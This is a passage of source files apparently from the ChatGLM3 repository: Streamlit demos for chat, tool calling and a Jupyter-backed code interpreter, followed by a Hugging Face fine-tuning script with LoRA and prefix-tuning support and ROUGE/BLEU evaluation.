conversation: Conversation, history: list[Conversation], placeholder: DeltaGenerator | None = None, ) -> None: history.append(conversation) conversation.show(placeholder) def main( prompt_text: str, top_p: float = 0.2, temperature: float = 0.1, repetition_penalty: float = 1.1, max_new_tokens: int = 1024, truncate_length: int = 1024, retry: bool = False ): manual_mode = st.toggle('Manual mode', help='Define your tools in YAML format. You need to supply tool call results manually.' 
) if manual_mode: with st.expander('Tools'): tools = st.text_area( 'Define your tools in YAML format here:', yaml.safe_dump([EXAMPLE_TOOL], sort_keys=False), height=400, ) tools = yaml_to_dict(tools) if not tools: st.error('YAML format error in tools definition') else: tools = get_tools() if 'tool_history' not in st.session_state: st.session_state.tool_history = [] if 'calling_tool' not in st.session_state: st.session_state.calling_tool = False if 'chat_history' not in st.session_state: st.session_state.chat_history = [] if prompt_text == "" and retry == False: print("\n== Clean ==\n") st.session_state.chat_history = [] return history: list[Conversation] = st.session_state.chat_history for conversation in history: conversation.show() if retry: print("\n== Retry ==\n") last_user_conversation_idx = None for idx, conversation in enumerate(history): if conversation.role == Role.USER: last_user_conversation_idx = idx if last_user_conversation_idx is not None: prompt_text = history[last_user_conversation_idx].content del history[last_user_conversation_idx:] if prompt_text: prompt_text = prompt_text.strip() role = st.session_state.calling_tool and Role.OBSERVATION or Role.USER append_conversation(Conversation(role, prompt_text), history) st.session_state.calling_tool = False placeholder = st.container() message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() for _ in range(5): output_text = '' for response in client.generate_stream( system=None, tools=tools, history=history, do_sample=True, max_new_tokens=max_new_tokens, temperature=temperature, top_p=top_p, stop_sequences=[str(r) for r in (Role.USER, Role.OBSERVATION)], repetition_penalty=repetition_penalty, ): token = response.token if response.token.special: print("\n==Output:==\n", output_text) match token.text.strip(): case '<|user|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return # Initiate tool call case '<|assistant|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) output_text = '' message_placeholder = placeholder.chat_message(name="tool", avatar="assistant") markdown_placeholder = message_placeholder.empty() continue case '<|observation|>': tool, *call_args_text = output_text.strip().split('\n') call_args_text = '\n'.join(call_args_text) append_conversation(Conversation( Role.TOOL, postprocess_text(output_text), tool, ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="observation", avatar="user") markdown_placeholder = message_placeholder.empty() try: code = extract_code(call_args_text) args = eval(code, {'tool_call': tool_call}, {}) except: st.error('Failed to parse tool call') return output_text = '' if manual_mode: st.info('Please provide tool call results below:') return else: with markdown_placeholder: with st.spinner(f'Calling tool {tool}...'): observation = dispatch_tool(tool, args) if len(observation) > truncate_length: observation = observation[:truncate_length] + ' [TRUNCATED]' append_conversation(Conversation( Role.OBSERVATION, observation ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() st.session_state.calling_tool = False break case _: st.error(f'Unexpected special token: {token.text.strip()}') return output_text += response.token.text 
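            # Re-render the partial assistant reply with a trailing '▌' cursor after every streamed token.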
markdown_placeholder.markdown(postprocess_text(output_text + '▌')) else: append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return File: composite_demo/demo_ci.py import base64 from io import BytesIO import os from pprint import pprint import queue import re from subprocess import PIPE import jupyter_client from PIL import Image import streamlit as st from streamlit.delta_generator import DeltaGenerator from client import get_client from conversation import postprocess_text, preprocess_text, Conversation, Role IPYKERNEL = os.environ.get('IPYKERNEL', 'chatglm3-demo') SYSTEM_PROMPT = '你是一位智能AI助手,你叫ChatGLM,你连接着一台电脑,但请注意不能联网。在使用Python解决任务时,你可以运行代码并得到结果,如果运行结果有错误,你需要尽可能对代码进行改进。你可以处理用户上传到电脑上的文件,文件默认存储路径是/mnt/data/。' client = get_client() class CodeKernel(object): def __init__(self, kernel_name='kernel', kernel_id=None, kernel_config_path="", python_path=None, ipython_path=None, init_file_path="./startup.py", verbose=1): self.kernel_name = kernel_name self.kernel_id = kernel_id self.kernel_config_path = kernel_config_path self.python_path = python_path self.ipython_path = ipython_path self.init_file_path = init_file_path self.verbose = verbose if python_path is None and ipython_path is None: env = None else: env = {"PATH": self.python_path + ":$PATH", "PYTHONPATH": self.python_path} # Initialize the backend kernel self.kernel_manager = jupyter_client.KernelManager(kernel_name=IPYKERNEL, connection_file=self.kernel_config_path, exec_files=[self.init_file_path], env=env) if self.kernel_config_path: self.kernel_manager.load_connection_file() self.kernel_manager.start_kernel(stdout=PIPE, stderr=PIPE) print("Backend kernel started with the configuration: {}".format( self.kernel_config_path)) else: self.kernel_manager.start_kernel(stdout=PIPE, stderr=PIPE) print("Backend kernel started with the configuration: {}".format( self.kernel_manager.connection_file)) if verbose: pprint(self.kernel_manager.get_connection_info()) # Initialize the code kernel self.kernel = self.kernel_manager.blocking_client() # self.kernel.load_connection_file() self.kernel.start_channels() print("Code kernel started.") def execute(self, code): self.kernel.execute(code) try: shell_msg = self.kernel.get_shell_msg(timeout=30) io_msg_content = self.kernel.get_iopub_msg(timeout=30)['content'] while True: msg_out = io_msg_content ### Poll the message try: io_msg_content = self.kernel.get_iopub_msg(timeout=30)['content'] if 'execution_state' in io_msg_content and io_msg_content['execution_state'] == 'idle': break except queue.Empty: break return shell_msg, msg_out except Exception as e: print(e) return None def execute_interactive(self, code, verbose=False): shell_msg = self.kernel.execute_interactive(code) if shell_msg is queue.Empty: if verbose: print("Timeout waiting for shell message.") self.check_msg(shell_msg, verbose=verbose) return shell_msg def inspect(self, code, verbose=False): msg_id = self.kernel.inspect(code) shell_msg = self.kernel.get_shell_msg(timeout=30) if shell_msg is queue.Empty: if verbose: print("Timeout waiting for shell message.") self.check_msg(shell_msg, verbose=verbose) return shell_msg def get_error_msg(self, msg, verbose=False) -> str | None: if msg['content']['status'] == 'error': try: error_msg = msg['content']['traceback'] except: try: error_msg = msg['content']['traceback'][-1].strip() except: error_msg = "Traceback Error" if verbose: print("Error: ", error_msg) return error_msg return None def check_msg(self, msg, verbose=False): status = 
msg['content']['status'] if status == 'ok': if verbose: print("Execution succeeded.") elif status == 'error': for line in msg['content']['traceback']: if verbose: print(line) def shutdown(self): # Shutdown the backend kernel self.kernel_manager.shutdown_kernel() print("Backend kernel shutdown.") # Shutdown the code kernel self.kernel.shutdown() print("Code kernel shutdown.") def restart(self): # Restart the backend kernel self.kernel_manager.restart_kernel() # print("Backend kernel restarted.") def interrupt(self): # Interrupt the backend kernel self.kernel_manager.interrupt_kernel() # print("Backend kernel interrupted.") def is_alive(self): return self.kernel.is_alive() def b64_2_img(data): buff = BytesIO(base64.b64decode(data)) return Image.open(buff) def clean_ansi_codes(input_string): ansi_escape = re.compile(r'(\x9B|\x1B\[|\u001b\[)[0-?]*[ -/]*[@-~]') return ansi_escape.sub('', input_string) def execute(code, kernel: CodeKernel) -> tuple[str, str | Image.Image]: res = "" res_type = None code = code.replace("<|observation|>", "") code = code.replace("<|assistant|>interpreter", "") code = code.replace("<|assistant|>", "") code = code.replace("<|user|>", "") code = code.replace("<|system|>", "") msg, output = kernel.execute(code) if msg['metadata']['status'] == "timeout": return res_type, 'Timed out' elif msg['metadata']['status'] == 'error': return res_type, clean_ansi_codes('\n'.join(kernel.get_error_msg(msg, verbose=True))) if 'text' in output: res_type = "text" res = output['text'] elif 'data' in output: for key in output['data']: if 'text/plain' in key: res_type = "text" res = output['data'][key] elif 'image/png' in key: res_type = "image" res = output['data'][key] break if res_type == "image": return res_type, b64_2_img(res) elif res_type == "text" or res_type == "traceback": res = res return res_type, res @st.cache_resource def get_kernel(): kernel = CodeKernel() return kernel def extract_code(text: str) -> str: pattern = r'```([^\n]*)\n(.*?)```' matches = re.findall(pattern, text, re.DOTALL) return matches[-1][1] # Append a conversation into history, while show it in a new markdown block def append_conversation( conversation: Conversation, history: list[Conversation], placeholder: DeltaGenerator | None = None, ) -> None: history.append(conversation) conversation.show(placeholder) def main( prompt_text: str, top_p: float = 0.2, temperature: float = 0.1, repetition_penalty: float = 1.1, max_new_tokens: int = 1024, truncate_length: int = 1024, retry: bool = False ): if 'ci_history' not in st.session_state: st.session_state.ci_history = [] if prompt_text == "" and retry == False: print("\n== Clean ==\n") st.session_state.chat_history = [] return history: list[Conversation] = st.session_state.chat_history for conversation in history: conversation.show() if retry: print("\n== Retry ==\n") last_user_conversation_idx = None for idx, conversation in enumerate(history): if conversation.role == Role.USER: last_user_conversation_idx = idx if last_user_conversation_idx is not None: prompt_text = history[last_user_conversation_idx].content del history[last_user_conversation_idx:] if prompt_text: prompt_text = prompt_text.strip() role = Role.USER append_conversation(Conversation(role, prompt_text), history) placeholder = st.container() message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() for _ in range(5): output_text = '' for response in client.generate_stream( system=SYSTEM_PROMPT, tools=None, history=history, 
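                # Note: `max_new_token=` on the next line appears to be a typo for `max_new_tokens`
                # (the other demos and `stream_chat` in client.py use `max_new_tokens`), so the
                # configured output length may not be applied as intended here.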
do_sample=True, max_new_token=max_new_tokens, temperature=temperature, top_p=top_p, stop_sequences=[str(r) for r in (Role.USER, Role.OBSERVATION)], repetition_penalty=repetition_penalty, ): token = response.token if response.token.special: print("\n==Output:==\n", output_text) match token.text.strip(): case '<|user|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return # Initiate tool call case '<|assistant|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="interpreter", avatar="assistant") markdown_placeholder = message_placeholder.empty() output_text = '' continue case '<|observation|>': code = extract_code(output_text) display_text = output_text.split('interpreter')[-1].strip() append_conversation(Conversation( Role.INTERPRETER, postprocess_text(display_text), ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="observation", avatar="user") markdown_placeholder = message_placeholder.empty() output_text = '' with markdown_placeholder: with st.spinner('Executing code...'): try: res_type, res = execute(code, get_kernel()) except Exception as e: st.error(f'Error when executing code: {e}') return print("Received:", res_type, res) if truncate_length: if res_type == 'text' and len(res) > truncate_length: res = res[:truncate_length] + ' [TRUNCATED]' append_conversation(Conversation( Role.OBSERVATION, '[Image]' if res_type == 'image' else postprocess_text(res), tool=None, image=res if res_type == 'image' else None, ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() output_text = '' break case _: st.error(f'Unexpected special token: {token.text.strip()}') break output_text += response.token.text display_text = output_text.split('interpreter')[-1].strip() markdown_placeholder.markdown(postprocess_text(display_text + '▌')) else: append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return else: st.session_state.chat_history = [] File: composite_demo/main.py import streamlit as st st.set_page_config( page_title="ChatGLM3 Demo", page_icon=":robot:", layout='centered', initial_sidebar_state='expanded', ) import demo_chat, demo_ci, demo_tool from enum import Enum DEFAULT_SYSTEM_PROMPT = ''' You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's instructions carefully. Respond using markdown. 
'''.strip() # Set the title of the demo st.title("ChatGLM3 Demo") # Add your custom text here, with smaller font size st.markdown( "<sub>智谱AI 公开在线技术文档: https://lslfd0slxc.feishu.cn/wiki/WvQbwIJ9tiPAxGk8ywDck6yfnof </sub> \n\n <sub> 更多 ChatGLM3-6B 的使用方法请参考文档。</sub>", unsafe_allow_html=True) class Mode(str, Enum): CHAT, TOOL, CI = '💬 Chat', '🛠️ Tool', '🧑‍💻 Code Interpreter' with st.sidebar: top_p = st.slider( 'top_p', 0.0, 1.0, 0.8, step=0.01 ) temperature = st.slider( 'temperature', 0.0, 1.5, 0.95, step=0.01 ) repetition_penalty = st.slider( 'repetition_penalty', 0.0, 2.0, 1.1, step=0.01 ) max_new_token = st.slider( 'Output length', 5, 32000, 256, step=1 ) cols = st.columns(2) export_btn = cols[0] clear_history = cols[1].button("Clear History", use_container_width=True) retry = export_btn.button("Retry", use_container_width=True) system_prompt = st.text_area( label="System Prompt (Only for chat mode)", height=300, value=DEFAULT_SYSTEM_PROMPT, ) prompt_text = st.chat_input( 'Chat with ChatGLM3!', key='chat_input', ) tab = st.radio( 'Mode', [mode.value for mode in Mode], horizontal=True, label_visibility='hidden', ) if clear_history or retry: prompt_text = "" match tab: case Mode.CHAT: demo_chat.main( retry=retry, top_p=top_p, temperature=temperature, prompt_text=prompt_text, system_prompt=system_prompt, repetition_penalty=repetition_penalty, max_new_tokens=max_new_token ) case Mode.TOOL: demo_tool.main( retry=retry, top_p=top_p, temperature=temperature, prompt_text=prompt_text, repetition_penalty=repetition_penalty, max_new_tokens=max_new_token, truncate_length=1024) case Mode.CI: demo_ci.main( retry=retry, top_p=top_p, temperature=temperature, prompt_text=prompt_text, repetition_penalty=repetition_penalty, max_new_tokens=max_new_token, truncate_length=1024) case _: st.error(f'Unexpected tab: {tab}') File: composite_demo/demo_chat.py import streamlit as st from streamlit.delta_generator import DeltaGenerator from client import get_client from conversation import postprocess_text, preprocess_text, Conversation, Role client = get_client() # Append a conversation into history, while show it in a new markdown block def append_conversation( conversation: Conversation, history: list[Conversation], placeholder: DeltaGenerator | None = None, ) -> None: history.append(conversation) conversation.show(placeholder) def main( prompt_text: str, system_prompt: str, top_p: float = 0.8, temperature: float = 0.95, repetition_penalty: float = 1.0, max_new_tokens: int = 1024, retry: bool = False ): placeholder = st.empty() with placeholder.container(): if 'chat_history' not in st.session_state: st.session_state.chat_history = [] if prompt_text == "" and retry == False: print("\n== Clean ==\n") st.session_state.chat_history = [] return history: list[Conversation] = st.session_state.chat_history for conversation in history: conversation.show() if retry: print("\n== Retry ==\n") last_user_conversation_idx = None for idx, conversation in enumerate(history): if conversation.role == Role.USER: last_user_conversation_idx = idx if last_user_conversation_idx is not None: prompt_text = history[last_user_conversation_idx].content del history[last_user_conversation_idx:] if prompt_text: prompt_text = prompt_text.strip() append_conversation(Conversation(Role.USER, prompt_text), history) placeholder = st.empty() message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() output_text = '' for response in client.generate_stream( system_prompt, 
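            # Chat mode is the only mode that uses the sidebar system prompt; tool mode
            # substitutes TOOL_PROMPT and the code interpreter uses its own fixed SYSTEM_PROMPT.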
tools=None, history=history, do_sample=True, max_new_tokens=max_new_tokens, temperature=temperature, top_p=top_p, stop_sequences=[str(Role.USER)], repetition_penalty=repetition_penalty, ): token = response.token if response.token.special: print("\n==Output:==\n", output_text) match token.text.strip(): case '<|user|>': break case _: st.error(f'Unexpected special token: {token.text.strip()}') break output_text += response.token.text markdown_placeholder.markdown(postprocess_text(output_text + '▌')) append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) File: finetune_demo/finetune_hf.py # -*- coding: utf-8 -*- import os import jieba import dataclasses as dc import functools from collections.abc import Callable, Mapping, Sequence from pathlib import Path from typing import Annotated, Any, Optional, Union import numpy as np import ruamel.yaml as yaml import torch import typer from datasets import Dataset, DatasetDict, NamedSplit, Split, load_dataset from nltk.translate.bleu_score import SmoothingFunction, sentence_bleu from peft import ( PeftConfig, PeftModelForCausalLM, get_peft_config, get_peft_model ) from rouge_chinese import Rouge from torch import nn from transformers import ( AutoModelForCausalLM, AutoTokenizer, EvalPrediction, GenerationConfig, PreTrainedModel, PreTrainedTokenizer, PreTrainedTokenizerFast, Seq2SeqTrainingArguments, AutoConfig, ) from transformers import DataCollatorForSeq2Seq as _DataCollatorForSeq2Seq from transformers import Seq2SeqTrainer as _Seq2SeqTrainer ModelType = Union[PreTrainedModel, PeftModelForCausalLM] TokenizerType = Union[PreTrainedTokenizer, PreTrainedTokenizerFast] app = typer.Typer(pretty_exceptions_show_locals=False) class DataCollatorForSeq2Seq(_DataCollatorForSeq2Seq): def __call__(self, features, return_tensors=None): output_ids = ( [feature['output_ids'] for feature in features] if 'output_ids' in features[0].keys() else None ) if output_ids is not None: max_output_length = max(len(out) for out in output_ids) if self.pad_to_multiple_of is not None: max_output_length = ( ( max_output_length + self.pad_to_multiple_of - 1) // self.pad_to_multiple_of * self.pad_to_multiple_of ) for feature in features: remainder = [self.tokenizer.pad_token_id] * ( max_output_length - len(feature['output_ids']) ) if isinstance(feature['output_ids'], list): feature['output_ids'] = feature['output_ids'] + remainder else: feature['output_ids'] = np.concatenate( [feature['output_ids'], remainder] ).astype(np.int64) return super().__call__(features, return_tensors) class Seq2SeqTrainer(_Seq2SeqTrainer): def prediction_step( self, model: nn.Module, inputs: dict[str, Any], prediction_loss_only: bool, ignore_keys=None, **gen_kwargs, ) -> tuple[Optional[float], Optional[torch.Tensor], Optional[torch.Tensor]]: if self.args.predict_with_generate: output_ids = inputs.pop('output_ids') input_ids = inputs['input_ids'] loss, generated_tokens, labels = super().prediction_step( model, inputs, prediction_loss_only, ignore_keys, **gen_kwargs ) generated_tokens = generated_tokens[:, input_ids.size()[1]:] if self.args.predict_with_generate: labels = output_ids return loss, generated_tokens, labels # For P-Tuning a new save_model function is fine for the prefix_encoder model # but may cost problems for the whole model loading # def save_model(self, output_dir: Optional[str] = None, _internal_call: bool = False): # if output_dir is None: # output_dir = self.args.output_dir # os.makedirs(output_dir, exist_ok=True) # ptuning_params 
= {k: v for k, v in self.model.transformer.prefix_encoder.state_dict().items()} # # torch.save(ptuning_params, os.path.join(output_dir, 'pytorch_model.bin')) # # print(f"P-Tuning model weights saved in {output_dir}") # # if self.tokenizer is not None: # self.tokenizer.save_pretrained(output_dir) def _resolve_path(path: Union[str, Path]) -> Path: return Path(path).expanduser().resolve() def _sanity_check( input_ids: Sequence[int], output_ids: Sequence[int], tokenizer: PreTrainedTokenizer, ): print('--> Sanity check') for in_id, out_id in zip(input_ids, output_ids): if in_id == 0: continue if in_id in tokenizer.tokenizer.index_special_tokens: in_text = tokenizer.tokenizer.index_special_tokens[in_id] else: in_text = tokenizer.decode([in_id]) print(f'{repr(in_text):>20}: {in_id} -> {out_id}') @functools.cache def _get_yaml_parser() -> yaml.YAML: parser = yaml.YAML(typ='safe', pure=True) parser.indent(mapping=2, offset=2, sequence=4) parser.default_flow_style = False return parser @dc.dataclass class DataConfig(object): train_file: str val_file: Optional[str] = None test_file: Optional[str] = None num_proc: Optional[int] = None @property def data_format(self) -> str: return Path(self.train_file).suffix @property def data_files(self) -> dict[NamedSplit, str]: return { split: data_file for split, data_file in zip( [Split.TRAIN, Split.VALIDATION, Split.TEST], [self.train_file, self.val_file, self.test_file], ) if data_file is not None } @dc.dataclass class FinetuningConfig(object): data_config: DataConfig max_input_length: int max_output_length: int training_args: Seq2SeqTrainingArguments = dc.field( default_factory=lambda: Seq2SeqTrainingArguments(output_dir='./output') ) peft_config: Optional[PeftConfig] = None def __post_init__(self): if not self.training_args.do_eval or self.data_config.val_file is None: # skips the evaluation stage when `do_eval` or `eval_file` is not provided self.training_args.do_eval = False self.training_args.evaluation_strategy = 'no' self.data_config.val_file = None else: self.training_args.per_device_eval_batch_size = ( self.training_args.per_device_eval_batch_size or self.training_args.per_device_train_batch_size ) @classmethod def from_dict(cls, **kwargs) -> 'FinetuningConfig': training_args = kwargs.get('training_args', None) if training_args is not None and not isinstance( training_args, Seq2SeqTrainingArguments ): gen_config = training_args.get('generation_config') # TODO: a bit hacky if not isinstance(gen_config, GenerationConfig): training_args['generation_config'] = GenerationConfig( **gen_config ) kwargs['training_args'] = Seq2SeqTrainingArguments(**training_args) data_config = kwargs.get('data_config') if not isinstance(data_config, DataConfig): kwargs['data_config'] = DataConfig(**data_config) peft_config = kwargs.get('peft_config', None) if peft_config is not None and not isinstance(peft_config, PeftConfig): kwargs['peft_config'] = get_peft_config(peft_config) return cls(**kwargs) @classmethod def from_file(cls, path: Union[str, Path]) -> 'FinetuningConfig': path = _resolve_path(path) kwargs = _get_yaml_parser().load(path) return cls.from_dict(**kwargs) def _load_datasets( data_dir: Path, data_format: str, data_files: dict[NamedSplit, str], num_proc: Optional[int], ) -> DatasetDict: if data_format in ('.csv', '.json', '.jsonl'): dataset_dct = load_dataset( data_format[1:], data_dir=data_dir, data_files=data_files, num_proc=num_proc, ) else: err_msg = f"Cannot load dataset in the '{data_format}' format." 
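        # Anything other than .csv, .json, or .jsonl ends up here.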
raise NotImplementedError(err_msg) return dataset_dct class DataManager(object): def __init__(self, data_dir: str, data_config: DataConfig): self._num_proc = data_config.num_proc self._dataset_dct = _load_datasets( _resolve_path(data_dir), data_config.data_format, data_config.data_files, self._num_proc, ) def _get_dataset(self, split: NamedSplit) -> Optional[Dataset]: return self._dataset_dct.get(split, None) def get_dataset( self, split: NamedSplit, process_fn: Callable[[dict[str, Any]], dict[str, Any]], batched: bool = True, remove_orig_columns: bool = True, ) -> Optional[Dataset]: orig_dataset = self._get_dataset(split) if orig_dataset is None: return if remove_orig_columns: remove_columns = orig_dataset.column_names else: remove_columns = None return orig_dataset.map( process_fn, batched=batched, remove_columns=remove_columns, num_proc=self._num_proc, ) def print_model_size(model: PreTrainedModel): print("--> Model") total_params = sum(p.numel() for p in model.parameters() if p.requires_grad) print(f"\n--> model has {total_params / 1e6}M params\n") def process_batch( batch: Mapping[str, Sequence], tokenizer: PreTrainedTokenizer, max_input_length: int, max_output_length: int, ) -> dict[str, list]: batched_tools = batch.get('tools', None) batched_conv = batch['conversations'] batched_input_ids = [] batched_labels = [] if batched_tools is None: batched_tools = [None] * len(batched_conv) for tools, conv in zip(batched_tools, batched_conv): input_ids, loss_masks = [ tokenizer.get_command('[gMASK]'), tokenizer.get_command('sop'), ], [False, False] if tools is not None: raise NotImplementedError() for message in conv: if message['role'] in ('system', 'user'): loss_mask_val = False else: loss_mask_val = True if message['role'] == 'tool': raise NotImplementedError() else: new_input_ids = tokenizer.build_single_message( message['role'], '', message['content'] ) new_loss_masks = [loss_mask_val] * len(new_input_ids) input_ids += new_input_ids loss_masks += new_loss_masks input_ids.append(tokenizer.eos_token_id) loss_masks = [False, *loss_masks] labels = [] for input_id, mask in zip(input_ids, loss_masks): if mask: labels.append(input_id) else: labels.append(-100) max_length = max_input_length + max_output_length + 1 batched_input_ids.append(input_ids[:max_length]) batched_labels.append(labels[:max_length]) return {'input_ids': batched_input_ids, 'labels': batched_labels} def process_batch_eval( batch: Mapping[str, Sequence], tokenizer: PreTrainedTokenizer, max_input_length: int, max_output_length: int, ) -> dict[str, list]: batched_tools = batch.get('tools', None) batched_conv = batch['conversations'] batched_input_ids = [] # To avoid computing loss, we do not provide the `labels` field in the input dictionary. 
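    # The reference completions are returned as `output_ids` instead; Seq2SeqTrainer.prediction_step
    # above pops them from the model inputs and uses them as labels when predict_with_generate is on.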
batched_output_ids = [] if batched_tools is None: batched_tools = [None] * len(batched_conv) for tools, conv in zip(batched_tools, batched_conv): input_ids = [ tokenizer.get_command('[gMASK]'), tokenizer.get_command('sop'), ] if tools is not None: raise NotImplementedError() for message in conv: if len(input_ids) >= max_input_length: break if message['role'] == 'tool': raise NotImplementedError() else: new_input_ids = tokenizer.build_single_message( message['role'], '', message['content'] ) if message['role'] == 'assistant': output_prompt, output_ids = ( new_input_ids[:1], new_input_ids[1:], ) output_ids.append(tokenizer.eos_token_id) batched_input_ids.append( input_ids[:max_input_length] + output_prompt[:1] ) batched_output_ids.append(output_ids[:max_output_length]) input_ids += new_input_ids return {'input_ids': batched_input_ids, 'output_ids': batched_output_ids} # Not sure if this is necessary, can set it to half. # If train with cpu, cast all params to fp32 instead of trainable ones. def _prepare_model_for_training(model: nn.Module, use_cpu: bool): for param in model.parameters(): if param.requires_grad or use_cpu: param.data = param.data.to(torch.float32) def load_tokenizer_and_model( model_dir: str, peft_config: Optional[PeftConfig] = None, ) -> tuple[PreTrainedTokenizer, nn.Module]: tokenizer = AutoTokenizer.from_pretrained(model_dir, trust_remote_code=True) if peft_config is not None: if peft_config.peft_type.name == "PREFIX_TUNING": config = AutoConfig.from_pretrained(model_dir, trust_remote_code=True) config.pre_seq_len = peft_config.num_virtual_tokens config.use_cache = False model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, config=config, ) if peft_config.peft_type.name == "LORA": model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, empty_init=False, use_cache=False ) model = get_peft_model(model, peft_config) model.print_trainable_parameters() else: model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, empty_init=False, use_cache=False ) print_model_size(model) return tokenizer, model def compute_metrics(eval_preds: EvalPrediction, tokenizer: PreTrainedTokenizer): batched_pred_ids, batched_label_ids = eval_preds metrics_dct = {'rouge-1': [], 'rouge-2': [], 'rouge-l': [], 'bleu-4': []} for pred_ids, label_ids in zip(batched_pred_ids, batched_label_ids): pred_txt = tokenizer.decode(pred_ids).strip() label_txt = tokenizer.decode(label_ids).strip() pred_tokens = list(jieba.cut(pred_txt)) label_tokens = list(jieba.cut(label_txt)) rouge = Rouge() scores = rouge.get_scores(' '.join(pred_tokens), ' '.join(label_tokens)) for k, v in scores[0].items(): metrics_dct[k].append(round(v['f'] * 100, 4)) metrics_dct['bleu-4'].append( sentence_bleu( [label_tokens], pred_tokens, smoothing_function=SmoothingFunction().method3, ) ) return {k: np.mean(v) for k, v in metrics_dct.items()} @app.command() def main( data_dir: Annotated[str, typer.Argument(help='')], model_dir: Annotated[ str, typer.Argument( help='A string that specifies the model id of a pretrained model configuration hosted on huggingface.co, or a path to a directory containing a model configuration file.' ), ], config_file: Annotated[str, typer.Argument(help='')], auto_resume_from_checkpoint: str = typer.Argument( default='', help='If entered as yes, automatically use the latest save checkpoint. If it is a numerical example 12 15, use the corresponding save checkpoint. 
If the input is no, restart training' ), ): ft_config = FinetuningConfig.from_file(config_file) tokenizer, model = load_tokenizer_and_model(model_dir, peft_config=ft_config.peft_config) data_manager = DataManager(data_dir, ft_config.data_config) train_dataset = data_manager.get_dataset( Split.TRAIN, functools.partial( process_batch, tokenizer=tokenizer, max_input_length=ft_config.max_input_length, max_output_length=ft_config.max_output_length, ), batched=True, ) print('train_dataset:', train_dataset) val_dataset = data_manager.get_dataset( Split.VALIDATION, functools.partial( process_batch_eval, tokenizer=tokenizer, max_input_length=ft_config.max_input_length, max_output_length=ft_config.max_output_length, ), batched=True, ) if val_dataset is not None: print('val_dataset:', val_dataset) test_dataset = data_manager.get_dataset( Split.TEST, functools.partial( process_batch_eval, tokenizer=tokenizer, max_input_length=ft_config.max_input_length, max_output_length=ft_config.max_output_length, ), batched=True, ) if test_dataset is not None: print('test_dataset:', test_dataset) # checks encoded dataset _sanity_check( train_dataset[0]["input_ids"], train_dataset[0]["labels"], tokenizer ) # turn model to fp32 _prepare_model_for_training(model, ft_config.training_args.use_cpu) ft_config.training_args.generation_config.pad_token_id = ( tokenizer.pad_token_id ) ft_config.training_args.generation_config.eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command('<|user|>'), tokenizer.get_command('<|observation|>'), ] model.gradient_checkpointing_enable() model.enable_input_require_grads() use_tokenizer = True if ft_config.peft_config is not None: use_tokenizer = False if ft_config.peft_config.peft_type == "LORA" else True trainer = Seq2SeqTrainer( model=model, args=ft_config.training_args, data_collator=DataCollatorForSeq2Seq( tokenizer=tokenizer, padding='longest', return_tensors='pt', ), train_dataset=train_dataset, eval_dataset=val_dataset.select(list(range(50))), tokenizer=tokenizer if use_tokenizer else None, # LORA does not need tokenizer compute_metrics=functools.partial(compute_metrics, tokenizer=tokenizer), ) if auto_resume_from_checkpoint.upper() == "" or auto_resume_from_checkpoint is None: trainer.train() else: def do_rf_checkpoint(sn): model.gradient_checkpointing_enable() model.enable_input_require_grads() checkpoint_directory = os.path.join(output_dir, "checkpoint-" + sn) print("resume checkpoint from checkpoint-" + sn) trainer.train(resume_from_checkpoint=checkpoint_directory) output_dir = ft_config.training_args.output_dir # resume from latest checkpoint if auto_resume_from_checkpoint.upper() == "YES": dirlist = os.listdir(output_dir) checkpoint_sn = 0 # get latest checkpoint for checkpoint_str in dirlist: if checkpoint_str.find("eckpoint") > 0 and checkpoint_str.find("tmp") == -1: checkpoint = int(checkpoint_str.replace("checkpoint-", "")) if checkpoint > checkpoint_sn: checkpoint_sn = checkpoint if checkpoint_sn > 0: do_rf_checkpoint(str(checkpoint_sn)) else: trainer.train() else: # resume from specific checkpoint if auto_resume_from_checkpoint.isdigit() and int(auto_resume_from_checkpoint) > 0: do_rf_checkpoint(auto_resume_from_checkpoint) else: print(auto_resume_from_checkpoint, "The specified checkpoint sn(" + auto_resume_from_checkpoint + ") has not been saved. 
Please search for the correct chkeckpoint in the model output directory") # test stage if test_dataset is not None: trainer.predict(test_dataset) if __name__ == '__main__': app() File: finetune_demo/inference_hf.py #!/usr/bin/env python # -*- coding: utf-8 -*- from pathlib import Path from typing import Annotated, Union import typer from peft import AutoPeftModelForCausalLM, PeftModelForCausalLM from transformers import ( AutoModelForCausalLM, AutoTokenizer, PreTrainedModel, PreTrainedTokenizer, PreTrainedTokenizerFast, ) ModelType = Union[PreTrainedModel, PeftModelForCausalLM] TokenizerType = Union[PreTrainedTokenizer, PreTrainedTokenizerFast] app = typer.Typer(pretty_exceptions_show_locals=False) def _resolve_path(path: Union[str, Path]) -> Path: return Path(path).expanduser().resolve() def load_model_and_tokenizer(model_dir: Union[str, Path]) -> tuple[ModelType, TokenizerType]: model_dir = _resolve_path(model_dir) if (model_dir / 'adapter_config.json').exists(): model = AutoPeftModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, device_map='auto' ) tokenizer_dir = model.peft_config['default'].base_model_name_or_path else: model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, device_map='auto' ) tokenizer_dir = model_dir tokenizer = AutoTokenizer.from_pretrained( tokenizer_dir, 